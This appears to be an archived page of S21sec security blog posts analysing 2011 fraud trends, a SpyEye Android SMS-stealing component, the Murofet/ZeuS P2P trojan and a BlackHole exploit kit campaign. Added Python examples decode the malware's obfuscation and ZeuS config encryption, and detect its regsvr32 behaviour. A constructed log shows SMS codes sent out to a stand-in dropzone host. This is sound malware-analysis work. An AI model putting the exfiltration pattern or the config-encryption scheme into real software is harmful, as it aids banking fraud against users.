
S21sec detects almost 7,000 vulnerabilities in 2011

S21sec presents its first ‘Vulnerability Report’, prepared by the Ecrime team, the company's experts responsible for detecting and resolving Internet offences affecting organisations 24 hours a day, 365 days a year. The report gathers the information on vulnerabilities detected by S21sec over the last decade, from 2001 to December 2011, and aims to build a picture of the main threats currently affecting companies, institutions and users.

The ‘Vulnerability Report’ includes all the vulnerabilities detected during the last year. 2011 was marked by the appearance of a large number of high-risk vulnerabilities, and the monthly count remained relatively constant except for March. That month registered a high number of vulnerabilities in Apple software affecting many of its products, such as iTunes, Safari, Mac OS X and iOS on the iPhone, among others.

We detected an increase in vulnerabilities during 2011, with growing remote exploitation and increasingly sophisticated industry-oriented trojans such as Stuxnet and Duqu. In browsers a shift can be observed: the exploitation of vulnerabilities is moving from Firefox to Chrome as the latter reaches the highest market share.

 
During this year we will continue to see increasing numbers of vulnerabilities in mobile devices running operating systems such as Android or iPhone OS. There are currently 5,600 million mobile phones in use (around 77% of the world population has one), of which 468 million are smartphones, a figure estimated to reach 631 million by 2015. Logically, with more users and more devices, exposure to vulnerabilities will also increase.

This ‘Vulnerability Report’, prepared by the S21sec Ecrime unit, can be downloaded here.
 

S21sec







A YEAR OF FRAUD (PART I)



The New Year is the ideal time to present a summary of everything we saw during 2011. The data presented here relate to fraud incidents closed by S21sec's SOC/CERT.

We acted on 4,759 fraud incidents that directly affected our clients, slightly fewer than the number recorded the previous year. The distribution of these incidents can be seen in the following graph.

Once again, phishing-related incidents outnumber those related to malicious code, mainly because our clients in Latin America suffered fewer malicious code incidents.

The following stack chart shows the monthly distribution of all incidents.

Two peaks in the number of recorded incidents can clearly be seen. This phenomenon repeats year after year and usually occurs around holiday periods, when users are generally more relaxed and less security conscious.

Personally, I feel 2011 has been disappointing, constantly promising major news but failing to deliver. 2010, in contrast, was a remarkable year: it brought both new attack methods (MitB and MitMo, man-in-the-browser and man-in-the-mobile) and new malicious code families (Tatanga, SpyEye, etc.).

What happened in 2011?

Now that we can review 2011 in its entirety, we can consider it a transitional year. During 2011 cyber-criminals improved their fraud-related methods and tools but did not introduce any notable innovations.

Could this stagnation be related to the global economic crisis?

It is hard to relate changes in fraud typology to the economic situation, but there is no doubt that certain aspects have influenced the past few months.

Social engineering attacks, usually carried out by individuals rather than organised groups, have increased considerably. The cost of preparing this kind of attack is low, which has drawn many newcomers (attracted by the prospect of rapid returns for minimal investment) onto the scene. This is particularly relevant in Latin America, the only region where we have seen incidents increase over the previous year.

On the other hand we have the much more complex and expensive malicious code attacks, usually carried out by well-organised mafias with abundant resources. In 2011 we expected SpyEye to take off, since the author of ZeuS (its main rival) abandoned development at the end of 2010 and the ZeuS source code subsequently became public. This did not happen, probably because of SpyEye's high price. Instead, we have seen some "gangs" take advantage of the leaked ZeuS code to develop new malware families without taking on the associated costs.

David Ávila

S21sec ecrime






Tourist Periscope will manage tourist information on the Web

S21sec labs is leading the Tourist Periscope project, with the aim of developing a technological solution that helps the tourism sector detect market opportunities and reduce the risk in strategic decision-making by predicting tourism trends.

The Internet is a source of vast amounts of information. For a company this often represents a threat, since it cannot manage such a volume, or a business opportunity that is hard to spot among so much data circulating on the Net.

The exponential growth of information in the tourism sector translates into serious difficulties for tourism companies, institutions and administrations when managing, identifying and optimising the search for content relevant to their business.

For this reason S21sec, drawing on its experience in developing open-source information classification, indexing and search technologies, will build the Tourist Periscope application at its security R&D centre, S21sec labs, in cooperation with specialists in the tourism sector from both academia and industry. The R&D project is framed within the INNPACTO programme of the Ministry of Economy and Competitiveness. The new IT platform will be oriented to the tourism sector and will manage and rationalise information efficiently according to the client's profile and the purpose to be achieved. The tool can analyse the tourism environment in a customised way, integrated with social networks, forming a Tourist Intelligence unit.

The purpose of Tourist Periscope is to give companies in the tourism sector a user-friendly technological solution to detect market opportunities and reduce strategic decision-making risk by anticipating tourist behaviour.

S21sec Marketing Department





New SpyEye Campaign with mobile complement

More than a year ago we saw for the first time how ZeuS had incorporated a mobile component in an attempt to steal the SMS messages that banks send while a transfer is being made. Later, SpyEye incorporated the same technique.

Recently we have seen a new campaign affecting Spanish banks which urges the user to install a component if their phone runs Android. While the first samples targeted Symbian and BlackBerry, later versions added Android to their objectives. The widespread use of this platform, together with the ease of developing applications for it, makes it one of the favourite targets of malware authors.

Infecting a mobile device is not a trivial task, so the user must be tricked through social engineering into infecting themselves. For this reason it is important to understand the risks: a user who is unaware that their mobile can be infected is completely vulnerable to this attack.

In the case in hand, when the user of an infected computer visits the bank's website, the trojan tries to convince them to install an application on their mobile phone, making them believe they are installing a program to secure communications.

Image 1: The user is asked for their phone operating system and phone number (Spanish)

Then comes the verification of the installation, asking for an activation code that the mobile displays once the application is installed.

Image 2: The user confirms an activation code received on their mobile (Spanish)

Finally, a successful installation message is displayed to the user.

Image 3: Application installed successfully – you are now protected (Spanish)


If the mobile is not an Android phone, SpyEye simply informs the user that no further security is required.

Image 4: Your phone does not require any further security (Spanish)

Although we have often heard the term "SpyEye for Android" used, it is used incorrectly: the component that infects mobiles is not a version of SpyEye, as it is not capable of intercepting online banking sessions or anything similar. It is a very simple application that forwards received SMS messages to an external server using a plain GET request with the data as parameters. It is merely a complement, totally independent of the malware that infects the computer, and it could be used interchangeably with any banking trojan.

As an example of the application's simplicity, the "encryption" of the string containing the dropzone URI consists solely of swapping the characters "=", "-" and "q", as can be seen in the following example, which is very similar to the original URI.
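The following is an added example, not code from the S21sec post or from the malware sample: it shows how an analyst would undo such a character swap to recover the dropzone URI and then reconstruct the forwarded SMS messages from the victim's proxy logs. The swap table, the query parameter names ("from", "text") and the log layout are all hypothetical stand-ins; the real values have to be read from the sample.

```python
"""Added example, not code from the S21sec post or from the malware: recovering the
dropzone URI and the forwarded SMS messages from the SMS-forwarder described above.

Assumptions (nothing here is taken from the sample): the swap table, the query
parameter names ("from", "text") and the proxy log layout are hypothetical stand-ins.
"""
from urllib.parse import urlsplit, parse_qs

# Hypothetical substitution standing in for the "= - q" character swap. The real
# table has to be read from the sample; a 3-character swap is not its own inverse,
# so encoder and decoder tables are kept separately.
OBFUSCATE = {"=": "-", "-": "q", "q": "="}
DEOBFUSCATE = {v: k for k, v in OBFUSCATE.items()}


def obfuscate(text: str) -> str:
    """What the APK would store: every '=', '-' and 'q' replaced per the table."""
    return "".join(OBFUSCATE.get(c, c) for c in text)


def deobfuscate(text: str) -> str:
    """Inverse mapping; everything outside the table passes through unchanged."""
    return "".join(DEOBFUSCATE.get(c, c) for c in text)


# Constructed: the string as it might sit in the APK, and the proxy log of the
# victim's mobile afterwards (one request per forwarded SMS, plus unrelated traffic).
STORED_URI = "http://dropqzone.invalid/in.php?id-"
CONSTRUCTED_PROXY_LOG = """\
1322557200 10.0.0.23 GET http://drop-zone.invalid/in.php?id=a1b2&from=%2B34600000000&text=Clave+de+firma+482913
1322557260 10.0.0.23 GET http://www.example.invalid/index.html
1322557300 10.0.0.23 GET http://drop-zone.invalid/in.php?id=a1b2&from=BANCO&text=Su+codigo+es+771042
"""


def recover_forwarded_sms(log_text: str, stored_uri: str) -> list:
    """Decode the dropzone URI, then pull sender/text out of every GET sent to it."""
    dropzone = urlsplit(deobfuscate(stored_uri))
    found = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "GET":
            continue
        url = urlsplit(parts[3])
        if (url.scheme, url.netloc, url.path) != (dropzone.scheme, dropzone.netloc, dropzone.path):
            continue
        qs = parse_qs(url.query)
        found.append({
            "ts": int(parts[0]),
            "from": qs.get("from", [""])[0],
            "text": qs.get("text", [""])[0],
        })
    return found


if __name__ == "__main__":
    print(deobfuscate(STORED_URI))
    for sms in recover_forwarded_sms(CONSTRUCTED_PROXY_LOG, STORED_URI):
        print(sms)
```

Because the "encryption" is a fixed substitution with no key, the decoder is a one-line table lookup; the only real work in an incident is matching the recovered URI against proxy or DNS logs to find out which messages (and therefore which one-time codes) left the phone.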

In short, we are facing a new infection campaign which, from a technical point of view, adds nothing new, but we must stress that people need to understand this kind of threat to avoid falling into the trap.

Mikel Gastesi
S21sec e-crime






Murofet: Changing to zlib

Time passes and new threats continue to emerge in the malware world, but the established ones keep evolving, and everything points to this continuing.

In this post we will once again talk about ZeuS and, in particular, the version known as Murofet.

Around June we discussed the different branches of ZeuS, and we have seen how the developers implemented new functionality such as P2P and domain name generation in what is known as Murofet 2.0.

In one of the latest samples received, something did not quite fit the usual behaviour. Investigating further, we discovered that certain sections, instead of being compressed with UCL, are now compressed with zlib.

Image 1: Use of zlib v 1.2.5
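As an added example (not S21sec's tooling), here is the check an analyst runs when a section that used to unpack as UCL no longer does: scan the blob for an RFC 1950 zlib header and only accept a hit once the stream inflates to a verified end-of-stream, so that the Adler-32 at the end rules out a coincidental byte pair. The sample blob below is constructed (padding, a decoy header, one real stream); it is not data from the Murofet sample.

```python
"""Added example, not S21sec's code: carving zlib streams out of a blob of unknown
layout. The sample blob is constructed here and is not data from the Murofet sample.
"""
import zlib


def looks_like_zlib_header(cmf: int, flg: int) -> bool:
    """RFC 1950: CM=8 (deflate), CINFO<=7 (<=32K window), FCHECK makes CMF*256+FLG
    divisible by 31, and FDICT is unset (no preset dictionary in normal use)."""
    return ((cmf & 0x0F) == 8 and (cmf >> 4) <= 7
            and ((cmf << 8) | flg) % 31 == 0 and not (flg & 0x20))


def find_zlib_streams(blob: bytes) -> list:
    """Return (offset, inflated, consumed) for every complete stream in blob.
    A header-looking pair that fails to inflate to a checked end-of-stream is skipped."""
    found, i = [], 0
    while i < len(blob) - 1:
        if looks_like_zlib_header(blob[i], blob[i + 1]):
            d = zlib.decompressobj()
            try:
                out = d.decompress(blob[i:])
            except zlib.error:              # bad block type / checksum mismatch: decoy
                out = None
            if out is not None and d.eof:   # eof is only set after a verified Adler-32
                consumed = len(blob) - i - len(d.unused_data)
                found.append((i, out, consumed))
                i += consumed
                continue
        i += 1
    return found


# Constructed sample: 8 bytes of padding, a decoy 0x78 0x9C pair followed by an
# invalid deflate block, then one genuine stream, then 8 bytes of trailing junk.
CONFIG = b"url_config=http://c2.invalid/cfg.bin\x00webinjects...\x00" * 4
DECOY = b"\x78\x9c\xff\xff\xff\xff"
TRAILER = b"junkjunk"
SAMPLE_BLOB = b"\x00" * 8 + DECOY + zlib.compress(CONFIG) + TRAILER
REAL_OFFSET = 8 + len(DECOY)


if __name__ == "__main__":
    for off, data, used in find_zlib_streams(SAMPLE_BLOB):
        print(f"zlib stream at {off:#x}, {used} bytes -> {len(data)} bytes inflated")
```

The decoy matters: `0x78 0x9C` is simply the most common header for default-level deflate, so it appears by chance in binaries and in other compressed data. Trusting the header alone gives false positives; trusting `d.eof` (which Python only sets after the trailing Adler-32 checks out) does not.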

ZeuS has evolved considerably. Gone are the days when each botnet did not have its own key and the encryption consisted of little more than a simple XOR. Recent developments show the creators' increasing maturity: they have stopped trying to reinvent the wheel and are incorporating existing, well-tested algorithms, far more robust than their predecessors, which is entirely logical.

If we focus on the gang behind Murofet in particular, we can see ongoing development that distinguishes it ever more from the official version. The changes introduced step by step, both internally (modifications to the configuration file's encryption) and in the added features mentioned above, indicate in-depth knowledge of the subject.

In addition, we must not forget that the first variant was seen before the source code leaked, which makes it clear that the group behind it has very clear objectives.

We will keep playing.

Jozsef Gegeny and Mikel Gastesi
S21sec e-crime





Murofet v2.0 (ZeuS P2P)

Following on from the previous post about the ZeuS "ACH transaction canceled" distribution campaign, we now look at the distributed binary.

This is version 2.0 of the ZeuS variant known as Murofet. It has come to be called ZeuS P2P because some of its features make use of this technique.

Of the recent versions this is the most evolved, with many modifications from the original. It is rumoured that it could come from the original author of ZeuS, as the modifications require a deep understanding of the original work.

The relationship to the original Murofet can be clearly seen in the configuration files: they differ from those of the original ZeuS yet resemble each other. They have new labels in some sections and an easily detectable feature, the ERCP delimiter, as shown in the following image:


In this variant the trojan uses a P2P structure to obtain the configuration file, an interesting modification. To do this it first uses a few hard-coded IP addresses and attempts to communicate with them over UDP:


Once in contact with bots belonging to the P2P network, if a newer version is detected it is downloaded over TCP using the trojan's own protocol:


If P2P communication fails, it changes to use domain name generation, as the first Murofet version did.

The storage locations, both for the binary and for the registry keys, are similar to previous versions, but in this version the configuration file is stored with RC4 encryption only, without the XOR layer (known as VisualEncrypt), logically enough, since that layer provides no security on its own.

Similarly, there is evidence that the trojan deletes the RC4 key from memory after each use, in a clear attempt to prevent it from being recovered from a memory dump.
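To make the point about the XOR layer concrete, here is an added example (not code from the S21sec post) with both layers written out in Python: RC4, and the keyless chained XOR that the ZeuS source names visualEncrypt, plus a helper that decides which storage format a decrypted blob is in. The visualEncrypt/visualDecrypt loops (each byte XORed with its predecessor) follow the leaked ZeuS 2.0 source; that the XOR layer sits beneath RC4 is taken from the same source and stated as an assumption; the key, config bytes and "CFG1" marker are constructed for the example.

```python
"""Added example, not code from the S21sec post: the two layers the text refers to,
RC4 and the keyless chained XOR the ZeuS source calls visualEncrypt, with a helper
that tells the classic and Murofet v2.0 storage formats apart.

Assumptions: the XOR loops follow the leaked ZeuS 2.0 source; the layer order
(XOR beneath RC4) is assumed from the same source; KEY, PLAIN and MARKER are constructed.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def visual_encrypt(data: bytes) -> bytes:
    """buf[i] ^= buf[i-1], walking forwards. No key is involved at all."""
    buf = bytearray(data)
    for i in range(1, len(buf)):
        buf[i] ^= buf[i - 1]
    return bytes(buf)


def visual_decrypt(data: bytes) -> bytes:
    """Inverse: same XOR walking backwards, so each step sees the original neighbour."""
    buf = bytearray(data)
    for i in range(len(buf) - 1, 0, -1):
        buf[i] ^= buf[i - 1]
    return bytes(buf)


def store_config_classic(key: bytes, plain: bytes) -> bytes:
    """Assumed ZeuS 2.x layout: XOR layer first, then RC4 over the result."""
    return rc4(key, visual_encrypt(plain))


def store_config_murofet(key: bytes, plain: bytes) -> bytes:
    """Murofet v2.0 as described above: RC4 only."""
    return rc4(key, plain)


MARKER = b"CFG1"   # constructed plaintext marker; a real config has its own structure


def recover_config(key: bytes, blob: bytes):
    """Undo RC4 with the botnet key, then decide whether an XOR layer is present by
    checking which reading starts with the expected marker. Returns (variant, plain)."""
    after_rc4 = rc4(key, blob)
    if after_rc4.startswith(MARKER):
        return "rc4-only", after_rc4
    stripped = visual_decrypt(after_rc4)   # needs no key: anyone can undo this layer
    if stripped.startswith(MARKER):
        return "rc4+visualencrypt", stripped
    return "unknown", after_rc4


# Constructed sample data.
KEY = b"botnet-key-example"
PLAIN = MARKER + b"\x00\x10url_server=http://c2.invalid/gate.php\x00" * 3


if __name__ == "__main__":
    for name, blob in (("classic", store_config_classic(KEY, PLAIN)),
                       ("murofet", store_config_murofet(KEY, PLAIN))):
        variant, plain = recover_config(KEY, blob)
        print(name, "->", variant, plain == PLAIN)
```

The security argument is visible in `recover_config`: whoever has the RC4 key (which is needed in either format) gets the plaintext, and `visual_decrypt` takes no secret input, so dropping that layer changes nothing for an attacker and only removes a step for the author. It is also why the post's next observation, wiping the RC4 key from memory after use, is where the real protection lies.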

Finally, the C&C server shown in the configuration file appears to be fake, in a clear attempt to mislead and delay analysis.

In summary, this is a modified version of ZeuS with very advanced characteristics: changes aimed at protecting itself from automatic analysis of the binary and at surviving the takedown of its network infrastructure, but without any notable functional changes.


Jozsef Gegeny & Santiago Vicente
S21sec e-crime





New ZeuS distribution campaign: ACH transaction canceled

Our team has detected a ZeuS trojan distribution campaign by email that has been running for some days. The malicious emails include a link to a supposed report about a cancelled transaction, which is actually an HTML page that loads JavaScript code into the victim's browser. This code tries to exploit different vulnerabilities in Java, Flash and PDF readers to install ZeuS 2.0 on the system, one of the latest versions of ZeuS, which uses P2P as part of its infrastructure.

The subject of the emails detected so far is "ACH transaction canceled", and the body contains information about a supposed transaction that has been cancelled. If the victim wants further information they have to visit a link that supposedly contains a report about the transaction:


For a few seconds the victim sees a screen asking them to wait. Meanwhile four scripts, hosted on different domains, are loaded into the user's browser. They are little more than simple redirections to the site hosting the code that attempts the exploitation.


There are currently three different domains hosting the malicious content, created on 2, 6 and 9 November, all resolving to the same IP address, located in Russia. The malicious content is obfuscated JavaScript belonging to the BlackHole exploit kit.


Once the code is de-obfuscated, several functions can be seen that attempt to exploit vulnerabilities in various plugins installed in the victim's browser:

  • Flash
  • Media Player


They all use the same (or very similar) shellcode, whose objective is to download and execute the malicious binary. In the analysed shellcode, besides executing the binary, which is stored on the system with a .dll extension, it launches regsvr32 with the -s parameter (silent mode) to try to register the DLL, even though the infection has already taken place (the first call to WinExec in the image below).
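The two WinExec calls give a defender two process-creation events to look for. As an added example that is not part of the S21sec post, the following Python runs two rules over constructed process-creation records: a browser or plugin host starting a freshly dropped file from a user-writable directory, and regsvr32 silently registering a DLL from such a directory. The log uses a simplified `seq|pid|ppid|image|cmdline` layout (not a real Sysmon or EDR format), and the process names, paths and file names are hypothetical.

```python
"""Added example, not part of the S21sec post: a detection for the shellcode behaviour
described above. The log is constructed in a simplified 'seq|pid|ppid|image|cmdline'
form (not a real Sysmon/EDR layout); process names, paths and file names are hypothetical.
"""
import re

USER_WRITABLE = re.compile(r"\\(?:temp|tmp|downloads)\\", re.I)
SILENT_FLAG = re.compile(r"(?:^|\s)[-/]s(?=\s|$)", re.I)
PLUGIN_HOSTS = {"iexplore.exe", "firefox.exe", "chrome.exe", "java.exe", "acrord32.exe"}

CONSTRUCTED_LOG = r"""
1|4120|1200|C:\Program Files\Internet Explorer\iexplore.exe|"iexplore.exe" http://report.invalid/ach.html
2|4188|4120|C:\Users\bob\AppData\Local\Temp\ovbw.dll|"C:\Users\bob\AppData\Local\Temp\ovbw.dll"
3|4190|4120|C:\Windows\System32\regsvr32.exe|regsvr32 -s C:\Users\bob\AppData\Local\Temp\ovbw.dll
4|5001|5000|C:\Windows\System32\regsvr32.exe|regsvr32 /s "C:\Program Files\Vendor\plugin.dll"
""".strip()


def parse(log_text: str) -> list:
    """One dict per line; pid/ppid as ints, image path and raw command line as strings."""
    rows = []
    for line in log_text.splitlines():
        seq, pid, ppid, image, cmdline = line.split("|", 4)
        rows.append({"seq": int(seq), "pid": int(pid), "ppid": int(ppid),
                     "image": image, "cmdline": cmdline})
    return rows


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(log_text: str) -> list:
    """Two rules; each alert carries the pid it fired on, the rule and the parent image."""
    rows = parse(log_text)
    image_by_pid = {r["pid"]: r["image"] for r in rows}
    alerts = []
    for r in rows:
        parent = basename(image_by_pid.get(r["ppid"], ""))
        # Rule 1: something executed straight out of a user-writable directory by a
        # browser / plugin host (the first WinExec in the shellcode).
        if USER_WRITABLE.search(r["image"]) and parent in PLUGIN_HOSTS:
            alerts.append({"pid": r["pid"], "rule": "dropped-file-exec", "parent": parent})
        # Rule 2: regsvr32 -s / /s registering a DLL that lives in a user-writable
        # directory (the second WinExec). Registering from Program Files is not flagged.
        if (basename(r["image"]) == "regsvr32.exe" and SILENT_FLAG.search(r["cmdline"])
                and USER_WRITABLE.search(r["cmdline"])):
            alerts.append({"pid": r["pid"], "rule": "regsvr32-silent-from-temp", "parent": parent})
    return alerts


if __name__ == "__main__":
    for a in detect(CONSTRUCTED_LOG):
        print(a)
```

Record 4 is the deliberate negative: a silent regsvr32 registration is routine for installers, so the rule keys on the DLL's location rather than on regsvr32 alone. Rule 1 needs the parent relationship, which is why the parse builds the pid-to-image map before evaluating any row.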


As mentioned above, the downloaded binary is ZeuS (P2P version). In the second part of this post we will give more details (behaviour, affected entities, etc.). Meanwhile, update your applications and don't click on suspicious links.


Jose Miguel Esparza
S21sec e-crime











© Copyright S21sec 2012 - All rights reserved

